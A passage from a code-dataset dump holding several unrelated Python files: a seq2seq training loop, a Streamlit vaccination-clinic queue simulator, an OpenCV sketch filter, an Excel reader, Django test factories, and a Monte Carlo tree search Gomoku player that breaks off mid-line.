loss\n\t\t\t\t\tmodel.reset_state()\n\t\t\t\t\tif args.attention:\n\t\t\t\t\t\tlast_hidden_states, last_layer_outputs = model.encode(source_batch, skip_mask)\n\t\t\t\t\t\tY = model.decode(target_batch_input, last_hidden_states, last_layer_outputs, skip_mask)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlast_hidden_states = model.encode(source_batch, skip_mask)\n\t\t\t\t\t\tY = model.decode(target_batch_input, last_hidden_states)\n\t\t\t\t\tloss = softmax_cross_entropy(Y, target_batch_output, ignore_label=ID_PAD)\n\t\t\t\t\toptimizer.update(lossfun=lambda: loss)\n\n\t\t\t\tsys.stdout.write(\"\\r{} / {}\".format(itr, num_iteration))\n\t\t\t\tsys.stdout.flush()\n\n\t\t\tif itr % args.interval == 0 or itr == num_iteration:\n\t\t\t\tsave_model(args.model_dir, model)\n\n\t\t# show log\n\t\tsys.stdout.write(\"\\r\" + stdout.CLEAR)\n\t\tsys.stdout.flush()\n\t\tprint_bold(\"translate (train)\")\n\t\tshow_random_source_target_translation(model, source_buckets_train, target_buckets_train, vocab_inv_source, vocab_inv_target, num_translate=5, argmax=True)\n\t\tprint_bold(\"translate (dev)\")\n\t\tshow_random_source_target_translation(model, source_buckets_dev, target_buckets_dev, vocab_inv_source, vocab_inv_target, num_translate=5, argmax=True)\n\t\tprint_bold(\"WER (sampled train)\")\n\t\twer_train = compute_random_mean_wer(model, source_buckets_train, 
target_buckets_train, len(vocab_inv_target), sample_size=args.batchsize, argmax=True)\n\t\tprint(mean(wer_train), wer_train)\n\t\tprint_bold(\"WER (dev)\")\n\t\twer_dev = compute_mean_wer(model, source_buckets_dev, target_buckets_dev, len(vocab_inv_target), batchsize=args.batchsize, argmax=True)\n\t\tmean_wer_dev = mean(wer_dev)\n\t\tprint(mean_wer_dev, wer_dev)\n\t\telapsed_time = (time.time() - start_time) / 60.\n\t\ttotal_time += elapsed_time\n\t\tprint(\"done in {} min, lr = {}, total {} min\".format(int(elapsed_time), optimizer.alpha, int(total_time)))\n\n\t\t# decay learning rate\n\t\tif prev_wer is not None and mean_wer_dev >= prev_wer and optimizer.alpha > min_learning_rate:\n\t\t\toptimizer.alpha *= 0.5\n\t\tprev_wer = mean_wer_dev\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--batchsize\", \"-b\", type=int, default=50)\n\tparser.add_argument(\"--epoch\", \"-e\", type=int, default=1000)\n\tparser.add_argument(\"--gpu-device\", \"-g\", type=int, default=0) \n\tparser.add_argument(\"--grad-clip\", \"-gc\", type=float, default=5) \n\tparser.add_argument(\"--weight-decay\", \"-wd\", type=float, default=5e-5) \n\tparser.add_argument(\"--ndim-h\", \"-nh\", type=int, default=320)\n\tparser.add_argument(\"--ndim-embedding\", \"-ne\", type=int, default=320)\n\tparser.add_argument(\"--num-layers\", \"-layers\", type=int, default=4)\n\tparser.add_argument(\"--interval\", type=int, default=100)\n\tparser.add_argument(\"--seed\", type=int, default=0)\n\tparser.add_argument(\"--pooling\", \"-p\", type=str, default=\"fo\")\n\tparser.add_argument(\"--wgain\", \"-w\", type=float, default=0.01)\n\tparser.add_argument(\"--train-split\", type=float, default=0.9)\n\tparser.add_argument(\"--dev-split\", type=float, default=0.05)\n\tparser.add_argument(\"--source-filename\", \"-source\", default=None)\n\tparser.add_argument(\"--target-filename\", \"-target\", default=None)\n\tparser.add_argument(\"--buckets-limit\", type=int, default=None)\n\tparser.add_argument(\"--model-dir\", \"-m\", type=str, default=\"model\")\n\tparser.add_argument(\"--learning-rate\", \"-lr\", type=float, default=0.01)\n\tparser.add_argument(\"--densely-connected\", \"-dense\", default=False, action=\"store_true\")\n\tparser.add_argument(\"--zoneout\", \"-zoneout\", default=False, action=\"store_true\")\n\tparser.add_argument(\"--dropout\", \"-dropout\", default=False, action=\"store_true\")\n\tparser.add_argument(\"--eve\", default=False, action=\"store_true\")\n\tparser.add_argument(\"--attention\", default=False, action=\"store_true\")\n\targs = parser.parse_args()\n\tmain(args)","sub_path":"seq2seq/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"390503739","text":"import random\r\nimport simpy\r\nimport numpy as np\r\nimport math\r\nimport streamlit as st\r\nfrom functools import partial, wraps\r\nimport scipy.stats\r\n\r\ndef conf_interval(data, confidence=0.95):\r\n a = 1.0 * np.array(data)\r\n n = len(a)\r\n m, se = np.mean(a), scipy.stats.sem(a)\r\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\r\n return h\r\n\r\ndef run_vaccination_simulation(NUM_REPS, RANDOM_SEED, NUM_CHECKIN, CHECKIN_TIME, PATIENT_INTER, SIM_TIME, NUM_VACCINATORS, VACCINATION_TIME, NUM_ADVERSEWAIT, ADVERSEWAIT_TIME):\r\n output_checkin_waittime = []\r\n output_checkin_waitnum = []\r\n output_vaccination_waittime = []\r\n output_vaccination_waitnum = []\r\n 
output_adverse_waittime = []\r\n output_adverse_waitnum = []\r\n output_total_facility_time = []\r\n output_num_vaccinated = []\r\n\r\n my_bar = st.progress(0.0)\r\n reps = math.ceil(NUM_REPS)\r\n for replication in range(0,reps):\r\n percent_complete = float(replication/reps)\r\n facility_arrival_times = []\r\n checkin_begin_times = []\r\n checkin_end_times = []\r\n vaccination_begin_times = []\r\n vaccination_end_times = []\r\n adverse_begin_times = []\r\n adverse_end_times = []\r\n facility_departure_times = []\r\n\r\n\r\n class Vaccination_Clinic(object):\r\n def __init__(self, env, num_checkin, checkin_time, num_vaccinators, vaccination_time, num_adversewait, adversewait_time):\r\n self.env = env\r\n self.checkin_personnel = simpy.Resource(env, num_checkin)\r\n self.checkintime = checkin_time\r\n self.vaccination_booth = simpy.Resource(env, num_vaccinators)\r\n self.vaccinationtime = vaccination_time\r\n self.adverse_event_spot = simpy.Resource(env, num_adversewait)\r\n self.adversewaittime = adversewait_time\r\n\r\n def checkin(self, patient):\r\n yield self.env.timeout(np.random.triangular(max(0.2, CHECKIN_TIME - 1), CHECKIN_TIME, CHECKIN_TIME + 1))\r\n\r\n\r\n def vaccinate(self, patient):\r\n yield self.env.timeout(np.random.triangular(max(VACCINATION_TIME - 1, 0.2), VACCINATION_TIME, VACCINATION_TIME + 1))\r\n\r\n def monitor_adverse(self, patient):\r\n yield self.env.timeout(ADVERSEWAIT_TIME)\r\n\r\n def patient(env, name, vac):\r\n #print('%s arrives at the vaccination clinic at %.2f.' % (name, env.now))\r\n facility_arrival_times.append(env.now)\r\n with vac.checkin_personnel.request() as request:\r\n yield request\r\n\r\n #print(\"%s arrives at check-in counter\" % name)\r\n checkin_begin_times.append(env.now)\r\n yield env.process(vac.checkin(name))\r\n checkin_end_times.append(env.now)\r\n #print(\"%s completes check-in at %.2f.\" % (name, env.now))\r\n\r\n with vac.vaccination_booth.request() as request:\r\n yield request\r\n vaccination_begin_times.append(env.now)\r\n #print(\"%s arrives at vaccination booth\" % name)\r\n yield env.process(vac.vaccinate(name))\r\n vaccination_end_times.append(env.now)\r\n\r\n\r\n #print(\"%s gets shot in the arm at %.2f.\" % (name, env.now))\r\n\r\n with vac.adverse_event_spot.request() as request:\r\n yield request\r\n adverse_begin_times.append(env.now)\r\n #print(\"%s proceeds to wait to monitor for adverse events\" % name)\r\n yield env.process(vac.monitor_adverse(name))\r\n adverse_end_times.append(env.now)\r\n facility_departure_times.append(env.now)\r\n #print(\"%s leaves facility safely at %.2f.\" % (name, env.now))\r\n\r\n def setup(env, num_checkin, checkin_time, num_vaccinators, vaccination_time, num_adversewait, adversewait_time, patient_inter):\r\n vaccinationclinic = Vaccination_Clinic(env, num_checkin, checkin_time, num_vaccinators, vaccination_time, num_adversewait, adversewait_time)\r\n i = 0\r\n while True:\r\n yield env.timeout(np.random.exponential(scale=patient_inter))\r\n i += 1\r\n env.process(patient(env, 'Patient %d' % i, vaccinationclinic)) \r\n\r\n\r\n random.seed(RANDOM_SEED)\r\n\r\n # Create an environment and start the setup process\r\n env = simpy.Environment()\r\n env.process(setup(env, NUM_CHECKIN, CHECKIN_TIME, NUM_VACCINATORS, VACCINATION_TIME, NUM_ADVERSEWAIT, ADVERSEWAIT_TIME, PATIENT_INTER))\r\n # Execute!\r\n env.run(until=SIM_TIME)\r\n average_facility_total_time = np.mean([facility_departure_times[i] - facility_arrival_times[i] for i in range(len(facility_departure_times))])\r\n 
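# Mean waits below are computed by pairing arrival/begin timestamps index-by-index,\r\n        # which is valid because simpy.Resource grants requests first-come-first-served.\r\n        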
#print(\"Approximate total time at facility is %.1f mins.\" % average_facility_total_time)\r\n average_checkin_wait_time = np.mean([checkin_begin_times[i] - facility_arrival_times[i] for i in range(len(checkin_begin_times))])\r\n #print(\"Approximate wait time between arrival and checkin is %.1f mins.\" % average_checkin_wait_time)\r\n average_vaccination_wait_time = np.mean([vaccination_begin_times[i] - checkin_end_times[i] for i in range(len(vaccination_begin_times))])\r\n #print(\"Approximate wait time between checkin and getting vaccinated is %.1f mins.\" % average_vaccination_wait_time)\r\n average_adverse_wait_time = np.mean([adverse_begin_times[i] - vaccination_end_times[i] for i in range(len(adverse_begin_times))])\r\n #print(\"Approximate wait time between getting vaccine and finding adverse monitoring wait spot is %.1f mins.\" % average_adverse_wait_time)\r\n\r\n avg_waiting_checkin = []\r\n for i in [x * 0.1 for x in range(0, SIM_TIME*10)]:\r\n num_arrived_facility = sum(1 for j in facility_arrival_times if j <= i)\r\n num_started_checin = sum(1 for j in checkin_begin_times if j <= i)\r\n avg_waiting_checkin.append(num_arrived_facility - num_started_checin)\r\n #print(\"Approximate # of patients waiting to checkin at any time is %.1f.\" % np.mean(avg_waiting_checkin))\r\n\r\n avg_waiting_vaccine = []\r\n for i in [x * 0.1 for x in range(0, SIM_TIME*10)]:\r\n num_finished_checin = sum(1 for j in checkin_end_times if j <= i)\r\n num_started_vaccine = sum(1 for j in vaccination_begin_times if j <= i)\r\n avg_waiting_vaccine.append(num_finished_checin - num_started_vaccine)\r\n #print(\"Approximate # of patients waiting between checkin and vaccine at any time is %.1f.\" % np.mean(avg_waiting_vaccine))\r\n\r\n avg_waiting_adverse = []\r\n for i in [x * 0.1 for x in range(0, SIM_TIME*10)]:\r\n num_finished_vaccine = sum(1 for j in vaccination_end_times if j <= i)\r\n num_started_adverse = sum(1 for j in adverse_begin_times if j <= i)\r\n avg_waiting_adverse.append(num_finished_vaccine - num_started_adverse)\r\n #print(\"Approximate # of patients waiting between checkin and vaccine at any time is %.1f.\" % np.mean(avg_waiting_vaccine))\r\n\r\n output_checkin_waittime.append(average_checkin_wait_time)\r\n output_checkin_waitnum.append(np.mean(avg_waiting_checkin))\r\n output_vaccination_waittime.append(average_vaccination_wait_time)\r\n output_vaccination_waitnum.append(np.mean(avg_waiting_vaccine))\r\n output_adverse_waittime.append(average_adverse_wait_time)\r\n output_adverse_waitnum.append(np.mean(avg_waiting_adverse))\r\n output_total_facility_time.append(average_facility_total_time)\r\n output_num_vaccinated.append(len(facility_departure_times))\r\n \r\n \r\n my_bar.progress(float(percent_complete))\r\n my_bar.progress(1.0) \r\n return [np.mean(output_checkin_waittime), np.mean(output_checkin_waitnum), np.mean(output_vaccination_waittime), \r\n np.mean(output_vaccination_waitnum), np.mean(output_adverse_waittime), np.mean(output_adverse_waitnum), conf_interval(output_total_facility_time),\r\n np.mean(output_total_facility_time), conf_interval(output_num_vaccinated), np.mean(output_num_vaccinated)]\r\n\r\n\r\nst.title('Vaccination Clinic Scheduling & Staffing Calculator')\r\n\r\nst.markdown('This calculator allows you to experiment with patient scheduling and personnel staffing at a single vaccination clinic \\\r\n to estimate the effects on desired operational goals and metrics. 
')\r\nst.markdown('The flow of patients through the clinic is assumed to be the following: Patients arrive to the facility according to a schedule. \\\r\n Patients proceed to one (of maybe several) check-in stations. If all stations are occupied, patients wait in line.\\\r\n Following check-in, patients proceed to one of several available vaccination booths (or wait in line if all are busy).\\\r\n After getting a vaccine, patients are asked to proceed to a waiting area for approximately 15 minutes while they are monitored for\\\r\n adverse reactions. After 15 minutes, patients may safely leave the facility.')\r\nst.markdown('If you would like to experiment with additional parameters or would like modifications, please feel free to reach out via mail')\r\nst.markdown('Some technical notes: Patient arrivals are assumed to adhere to a poisson arrival process. Times to check-in and get a shot are assumed to be triangular around the mean. To play around with modifying these distributions, \\\r\n please feel free to reach out.')\r\n\r\nst.sidebar.title(\"Input values here\")\r\n\r\nnum_arrive_hour = st.sidebar.number_input(\"Patients expected per hour\", min_value = 1, value = 30)\r\n# num_checkin = st.sidebar.number_input(\"Check-in counters\", min_value = 1, value = 1)\r\n# num_vaccine_booths = st.sidebar.number_input(\"Vaccination booths\", min_value = 1, value = 5)\r\nnum_waiting_area_adverse = st.sidebar.number_input(\"Waiting spots to monitor patients for adverse reactions\", min_value = 1, value = 5)\r\nhours_facility_open = st.sidebar.number_input(\"Hours of facility opening\", min_value = 1, value = 8)\r\n\r\n# CHECKIN_TIME = st.sidebar.number_input(\"Minutes for a single patient check-in\", min_value = 0.1, value = 1.0)\r\n# VACCINATION_TIME = st.sidebar.number_input(\"Minutes for a single vaccination\", min_value = 0.1, value = 4.0)\r\n\r\nwith st.sidebar.beta_expander(\"Check-in counter parameters\", True):\r\n CHECKIN_TIME = st.number_input(\"Minutes for a single patient check-in\", min_value = 0.1, value = 1.0)\r\n num_checkin = st.number_input(\"Input the number of check-in counters available for your patients\", min_value = 1, value = 1)\r\n # num_arrive_hour = st.number_input(\"Input the number of patients you expect will arrive in an hour\", min_value = 1, value = 30)\r\n\r\nwith st.sidebar.beta_expander(\"Vaccination booth parameters\", True):\r\n num_vaccine_booths = st.number_input(\"Vaccination booths\", min_value = 1, value = 5)\r\n VACCINATION_TIME = st.number_input(\"Minutes for a single vaccination\", min_value = 0.1, value = 4.0) \r\n\r\nst.sidebar.write(\"\"\"\\n \\n \\n\"\"\")\r\n\r\nif(st.sidebar.button('Calculate Metrics')): \r\n RANDOM_SEED = 42\r\n NUM_CHECKIN = num_checkin\r\n #CHECKIN_TIME = 1\r\n PATIENT_INTER = 60/num_arrive_hour\r\n #NUM_REPS = 15\r\n NUM_REPS = math.ceil(-0.114*num_arrive_hour + 33.4)\r\n SIM_TIME = 60*hours_facility_open\r\n NUM_VACCINATORS = num_vaccine_booths\r\n #VACCINATION_TIME = 4\r\n NUM_ADVERSEWAIT = num_waiting_area_adverse\r\n ADVERSEWAIT_TIME = 15\r\n [avg_checkin_waitT, avg_checkin_waitN, avg_vaccine_waitT, avg_vaccine_waitN, avg_adverse_waitT, avg_adverse_waitN, conf_total_time, avg_total_time, conf_total_vaccinated, tot_num_vaccinated] = run_vaccination_simulation(NUM_REPS, RANDOM_SEED, NUM_CHECKIN, CHECKIN_TIME, PATIENT_INTER, SIM_TIME, NUM_VACCINATORS, VACCINATION_TIME, NUM_ADVERSEWAIT, ADVERSEWAIT_TIME)\r\n if(avg_total_time <= 30):\r\n st.success(\"Patients can expect to be in the facility for approximately {:0.1f} 
mins.\".format(avg_total_time)) \r\n elif(avg_total_time <= 60):\r\n st.warning(\"Patients can expect to be in the facility for approximately {:0.1f} mins.\".format(avg_total_time))\r\n else:\r\n st.error(\"Patients can expect to be in the facility for approximately {:0.1f} mins.\".format(avg_total_time))\r\n \r\n if(avg_checkin_waitN <= 5):\r\n st.success(\"An average of {:0.0f} patients will wait in line for check-in\".format(avg_checkin_waitN))\r\n elif(avg_checkin_waitN <= 15):\r\n st.warning(\"An average of {:0.0f} patients will wait in line for check-in. May need more check-in counters\".format(avg_checkin_waitN))\r\n else:\r\n st.error(\"An average of {:0.0f} patients will wait in line for check-in. Please add more check-in counters\".format(avg_checkin_waitN))\r\n\r\n if(avg_vaccine_waitN < 5):\r\n st.success(\"An average of {:0.0f} patients will wait in line between check-in and vaccination.\".format(avg_vaccine_waitN))\r\n if(avg_vaccine_waitN >= 5):\r\n st.error(\"An average of {:0.0f} patients will wait in line between check-in and vaccination. Please add more vaccination booths.\".format(avg_vaccine_waitN))\r\n\r\n if(avg_adverse_waitN <= 2):\r\n st.success(\"An average of {:0.0f} patients will not have adverse waiting spots.\".format(avg_adverse_waitN))\r\n else:\r\n st.error(\"An average of {:0.0f} patients will not have adverse waiting spots. Please add more.\".format(avg_adverse_waitN))\r\n \r\n st.info(\"Approximately {:0.0f} patients can expect to be vaccinated during this {} hour time-frame\".format(tot_num_vaccinated, hours_facility_open))\r\n\r\n","sub_path":"vaccine-estimator.py","file_name":"vaccine-estimator.py","file_ext":"py","file_size_in_byte":13621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"152127203","text":"\n\n#calss header\nclass _WOODCARVING():\n\tdef __init__(self,): \n\t\tself.name = \"WOODCARVING\"\n\t\tself.definitions = [u'the process of cutting into the surface of wood to create a decorative shape or pattern: ', u'a piece of wood that has been decorated in this way: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_woodcarving.py","file_name":"_woodcarving.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"522648024","text":"import cv2 #pip3 install opencv-python\n\nimage = cv2.imread(\"02.jpg\")\ngray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncv2.imwrite(\"gray.png\", gray_image)\ninverted_image = 255 - gray_image\ncv2.imwrite(\"inv.png\", inverted_image)\nblurred = cv2.GaussianBlur(inverted_image, (21, 21), 0)\ncv2.imwrite(\"blur.png\", blurred)\ninverted_blurred = 255 - blurred\ncv2.imwrite(\"invblur.png\", inverted_blurred)\npencil_sketch = cv2.divide(gray_image, inverted_blurred, scale=256.0)\ncv2.imwrite(\"Sketch.png\", pencil_sketch)","sub_path":"image_to_sketch/sketch.py","file_name":"sketch.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"564265837","text":"# _*_ coding: UTF-8 _*_\n# @Time : 2021/10/21 19:25\n# @Author : caoyujie\n# @Site : \n# @File : excel_openpyxl.py\n# @Software : PyCharm\n\n\nimport openpyxl\n\nexcel=openpyxl.load_workbook('../other_projects/openpyxll.xlsx')\n\nfor i 
in excel.sheetnames:\n    # excel[i] is just a worksheet object\n    for j in excel[i].values:\n        # contents of each row\n        if type(j[0]) is int:\n            print(j)\n\n\n","sub_path":"other_projects/excel_openpyxl.py","file_name":"excel_openpyxl.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"338247194","text":"import factory\nfrom faker import Factory as FakerFactory\nfrom django.core.files import File\nfrom pytz import timezone\n\nfrom intake import models\nfrom unittest.mock import Mock\n\nfake = FakerFactory.create('en_US', includes=['intake.tests.mock_county_forms'])\nPacific = timezone('US/Pacific')\n\nRAW_FORM_DATA = {\n    'address_city': [''],\n    'address_state': ['CA'],\n    'address_street': [''],\n    'address_zip': [''],\n    'dob_day': [''],\n    'dob_month': [''],\n    'dob_year': [''],\n    'drivers_license_number': [''],\n    'email': [''],\n    'first_name': [''],\n    'how_did_you_hear': [''],\n    'last_name': [''],\n    'middle_name': [''],\n    'monthly_expenses': [''],\n    'monthly_income': [''],\n    'phone_number': [''],\n    'ssn': [''],\n    'when_probation_or_parole': [''],\n    'when_where_outside_sf': [''],\n    'where_probation_or_parole': ['']\n}\n\n\ndef local(datetime):\n    return Pacific.localize(datetime)\n\n\nclass FormSubmissionFactory(factory.DjangoModelFactory):\n    date_received = factory.LazyFunction(\n        lambda: local(fake.date_time_between('-2w', 'now')))\n    answers = factory.LazyFunction(\n        lambda: fake.sf_county_form_answers())\n\n    class Meta:\n        model = models.FormSubmission\n\n\nclass FillablePDFFactory(factory.DjangoModelFactory):\n    class Meta:\n        model = models.FillablePDF\n\n\ndef fillable_pdf():\n    return FillablePDFFactory.create(\n        name = \"Sample PDF\",\n        pdf = File(open(\n            'tests/sample_pdfs/sample_form.pdf', 'rb')),\n        translator = \"tests.sample_translator.translate\"\n    )\n\nclass FrontSendMessageResponse:\n    SUCCESS_JSON = {'status': 'accepted'}\n    ERROR_JSON = {'errors': [{'title': 'Bad request', 'detail': 'Body did not satisfy requirements', 'status': '400'}]}\n    \n    @classmethod\n    def _make_response(cls, status_code, json):\n        mock_response = Mock(status_code=status_code)\n        mock_response.json.return_value = json\n        return mock_response\n\n    @classmethod\n    def success(cls):\n        return cls._make_response(202, cls.SUCCESS_JSON)\n\n    @classmethod\n    def error(cls):\n        return cls._make_response(400, cls.ERROR_JSON)\n\n","sub_path":"intake/tests/mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"552649953","text":"from goboard import Player, BoardInfo, GuiManager\nimport random\nfrom math import *\nimport time\n\n# stone value notations\n# '*' : where you put stone in this action.\n# '?' : don't know state.\n# '1' : our stone\n# '2' : enemy's stone\n# '0' : empty\n# 'x' : boundary\nvalues = {\n    '?*1?': 0,\n    '?*11?': 0,\n    '?*111?': 0,\n    '?*1111?': -10000,\n    '?*2?': 1,\n    '?*22?': 10,\n    '?*222?': 100,\n    '?*2222?': 1000,\n}\n\nclass Ai(Player):\n    def __init__(self, color, **kwargs):\n        super(Ai, self).__init__(color)\n        self.state = GomokuState()\n        self.state.color = color\n        self.action_number = 0\n        try:\n            size_x, size_y = kwargs['board_size']\n            self.state.n = size_x\n        except KeyError:\n            self.state.n = 13\n\n    def get_action(self, board: BoardInfo) -> (int, int):\n\n        self.get_alert(board)\n\n        self.action_number = self.action_number + 1\n        self.state.update_with_board_info(board)\n        maxtime = 2\n        if self.action_number == 1:\n            maxtime = 5\n        move = UCT(rootstate=self.state, maxtime=maxtime, verbose=False)\n        print(\"Best Move: \" + str(move))\n        possible_x = int(move / self.state.n)\n        possible_y = int(move % self.state.n)\n        if board.is_legal_action(possible_x, possible_y):\n            print(\"Move possible: %d,%d\" % (possible_x, possible_y))\n            return possible_x, possible_y\n        else:\n            print(\"Move not possible: %d,%d\" % (possible_x, possible_y))\n            # default to easy ai for now, need another solution\n            for x in range(0, board.size_x):\n                for y in range(0, board.size_y):\n                    if board.is_legal_action(x, y):\n                        return x, y\n                    else:\n                        continue\n    def get_alert(self, board: BoardInfo):\n        defensive_actions, winning_actions = self.get_critical_actions(board)\n        print(\"ALERT\")\n        print(defensive_actions)\n        print(winning_actions)\n\n    def get_critical_actions(self, board: BoardInfo):\n\n        defensive_actions = []\n        winning_actions = []\n        for ((x, y), _) in board.steps:\n            for (dx, dy) in [(1, 0), (-1, 0), (0, 1), (0, -1), (1, 1), (-1, -1), (-1, 1), (1, -1)]:\n                if board.is_legal_action(x + dx, y + dy):\n                    weight = analysis_action(board, (x + dx, y + dy), self.color)\n                    if weight >= 100:\n                        defensive_actions.append(((x + dx, y + dy), weight))\n\n                    if weight <= -1:\n                        winning_actions.append(((x + dx, y + dy), weight))\n\n        defensive_actions = sorted(defensive_actions, key=lambda x: x[1], reverse=True)\n        return defensive_actions, winning_actions\n\n\nclass GomokuState:\n\n    def update_with_board_info(self, board_info):\n        self.board = [0 for element in range(self.n * self.n)]\n        # the board is indexed row-major as x * n + y (see get_action), for both colors\n        for x in range(0, board_info.size_x):\n            for y in range(0, board_info.size_y):\n                if board_info.is_black(x, y):\n                    if self.color == \"black\":\n                        self.board[int(x * self.n) + y] = 1\n                    else:\n                        self.board[int(x * self.n) + y] = 2\n                else:\n                    if board_info.is_white(x, y):\n                        if self.color == \"white\":\n                            self.board[int(x * self.n) + y] = 1\n                        else:\n                            self.board[int(x * self.n) + y] = 2\n        # print(self)\n\n    def __init__(self):\n        self.color = \"white\"\n        self.playerJustMoved = 2  # At the root pretend the player just moved is p2 - p1 has the first move\n        self.n = 13  # board size\n        self.board = [0 for element in range(self.n * self.n)]  # 0 = empty, 1 = player 1, 2 = player 2\n        self.win_positions = []\n        self.win_positions += self.generate_diagonal_win_positions()\n        self.win_positions += self.generate_horizontal_win_positions()\n        self.win_positions += self.generate_vertical_win_positions()\n\n    def Clone(self):\n        \"\"\" Create a deep clone of this game state.\n        \"\"\"\n        st = GomokuState()\n        st.playerJustMoved = self.playerJustMoved\n        st.board = self.board[:]\n        st.n = self.n\n        st.win_positions = self.win_positions\n        st.color = self.color\n        return st\n\n    def DoMove(self, move):\n        \"\"\" Update a state by carrying out the given move.\n            Must update playerToMove.\n        
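    Raises an AssertionError if the move is off the board, non-integral, or the square is already occupied.\n        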
\"\"\"\n assert move >= 0 and move < (self.n * self.n) and move == int(move) and self.board[move] == 0\n self.playerJustMoved = 3 - self.playerJustMoved\n self.board[move] = self.playerJustMoved\n\n def GetMoves(self):\n \"\"\" Get all possible moves from this state.\n \"\"\"\n # if self.player_has_won():\n # print(self)\n # return []\n return [i for i in range(self.n * self.n) if self.board[i] == 0]\n\n def GetResult(self, playerjm):\n \"\"\" Get the game result from the viewpoint of playerjm.\n \"\"\"\n for (v, w, x, y, z) in self.win_positions:\n if self.board[v] == self.board[w] == self.board[x] == self.board[y] == self.board[z]:\n if self.board[v] == playerjm:\n return 1.0\n else:\n return 0.0\n if self.GetMoves() == []: return 0.5 # draw\n assert False # Should not be possible to get here\n\n def player_has_won(self):\n for (v, w, x, y, z) in self.win_positions:\n if (self.board[v] == 1 or self.board[v] == 2) and (\n self.board[v] == self.board[w] == self.board[x] == self.board[y] == self.board[z]):\n return True\n return False\n\n def generate_horizontal_win_positions(self):\n h_win_positions = []\n for i in range(0, (self.n * self.n)):\n if ((i % self.n) < self.n) and (((i % self.n) + 5) < self.n):\n h_win_positions += [(i, i + 1, i + 2, i + 3, i + 4)]\n return h_win_positions\n\n def generate_vertical_win_positions(self):\n v_win_positions = []\n for i in range(0, (self.n * self.n)):\n if ((i % self.n) < self.n) and ((i + 5 * self.n) < self.n * self.n):\n v_win_positions += [(i, i + 1 * self.n, i + 2 * self.n, i + 3 * self.n, i + 4 * self.n)]\n return v_win_positions\n\n def generate_diagonal_win_positions(self):\n d_win_positions = []\n n = self.n\n for i in range(0, (self.n * self.n)):\n if ((i % n) < n) and ((i + 4 * n + 4) <= (n * n - 1) and (i % n) + 4 < n):\n d_win_positions += [(i, i + 1 * n + 1, i + 2 * n + 2, i + 3 * n + 3, i + 4 * n + 4)]\n if ((i % n) < n) and ((i + 4 * n - 4) <= (n * n - 1) and (i % n) - 4 >= 0):\n d_win_positions += [(i, i + 1 * n - 1, i + 2 * n - 2, i + 3 * n - 3, i + 4 * n - 4)]\n return d_win_positions\n\n def __repr__(self):\n s = \"\"\n for i in range(self.n * self.n):\n if self.board[i] == 0:\n s += '[ ]'\n else:\n if self.board[i] == 1:\n s += '[1]'\n else:\n if self.board[i] == 2:\n s += '[2]'\n if i % self.n == self.n - 1:\n s += '\\n'\n return s\n\n\nclass Node:\n \"\"\" A node in the game tree. Note wins is always from the viewpoint of playerJustMoved.\n Crashes if state not specified.\n \"\"\"\n\n def __init__(self, move=None, parent=None, state=None):\n self.move = move # the move that got us to this node - \"None\" for the root node\n self.parentNode = parent # \"None\" for the root node\n self.childNodes = []\n self.wins = 0\n self.visits = 0\n self.untriedMoves = state.GetMoves() # future child nodes\n self.playerJustMoved = state.playerJustMoved # the only part of the state that the Node needs later\n\n def UCTSelectChild(self):\n \"\"\" Use the UCB1 formula to select a child node. 
Often a constant UCTK is applied so we have\n lambda c: c.wins/c.visits + UCTK * sqrt(2*log(self.visits)/c.visits to vary the amount of\n exploration versus exploitation.\n \"\"\"\n s = sorted(self.childNodes, key=lambda c: c.wins / c.visits + sqrt(2 * log(self.visits) / c.visits))[-1]\n return s\n\n def AddChild(self, m, s):\n \"\"\" Remove m from untriedMoves and add a new child node for this move.\n Return the added child node\n \"\"\"\n n = Node(move=m, parent=self, state=s)\n self.untriedMoves.remove(m)\n self.childNodes.append(n)\n return n\n\n def Update(self, result):\n \"\"\" Update this node - one additional visit and result additional wins. result must be from the viewpoint of playerJustmoved.\n \"\"\"\n self.visits += 1\n self.wins += result\n\n def __repr__(self):\n return \"[M:\" + str(self.move) + \" W/V:\" + str(self.wins) + \"/\" + str(self.visits) + \" U:\" + str(\n self.untriedMoves) + \"]\"\n\n def TreeToString(self, indent):\n s = self.IndentString(indent) + str(self)\n for c in self.childNodes:\n s += c.TreeToString(indent + 1)\n return s\n\n def IndentString(self, indent):\n s = \"\\n\"\n for i in range(1, indent + 1):\n s += \"| \"\n return s\n\n def ChildrenToString(self):\n s = \"\"\n for c in self.childNodes:\n s += str(c) + \"\\n\"\n return s\n\ndef analysis_action(board: BoardInfo, action, color):\n if color == \"black\":\n is_empty = board.is_empty\n is_our = board.is_black\n is_enemy = board.is_white\n else:\n is_empty = board.is_empty\n is_our = board.is_white\n is_enemy = board.is_black\n\n x, y = action\n directions = [(1, 0), (-1, 0), (0, 1), (0, -1), (1, 1), (-1, -1), (-1, 1), (1, -1)]\n weight = 0\n\n for dx, dy in directions:\n if is_our(x + dx, y + dy):\n weight += values['?*1?']\n if is_our(x + dx, y + dy) and is_our(x + 2 * dx, y + 2 * dy):\n weight += values['?*11?']\n if is_our(x + dx, y + dy) and is_our(x + 2 * dx, y + 2 * dy) and is_our(x + 3 * dx, y + 3 * dy):\n weight += values['?*111?']\n if is_our(x + dx, y + dy) and is_our(x + 2 * dx, y + 2 * dy) and is_our(x + 3 * dx, y + 3 * dy) and is_our(\n x + 4 * 